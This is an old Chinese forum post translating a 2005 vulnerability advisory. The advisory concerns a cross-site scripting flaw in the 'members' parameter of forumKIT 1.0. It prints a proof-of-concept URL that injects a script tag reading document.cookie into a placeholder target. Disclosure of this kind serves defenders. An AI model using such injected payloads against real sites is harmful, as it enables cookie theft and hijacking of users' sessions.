发新话题
打印

[翻译]ForumKIT跨站脚本漏洞

[翻译]ForumKIT跨站脚本漏洞

本文作者: 剑心[B.C.T]
翻译网站: http://www.bnso.net

发布日期:2005.1.14
漏洞来源:tom cruise <the.n3t(at)gmail.com>
漏洞系统:
forumKIT 1.0
漏洞描述:
在members变量中存在一个跨站脚本漏洞,你可以替换true的值为跨站攻击代码。
利用示范:
http://forum.target.com/f.aspx?members=">
<script>alert(document.cookie);</script>
漏洞发现:neO
联系地址:al_modamer@hotmail.com
白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

发新话题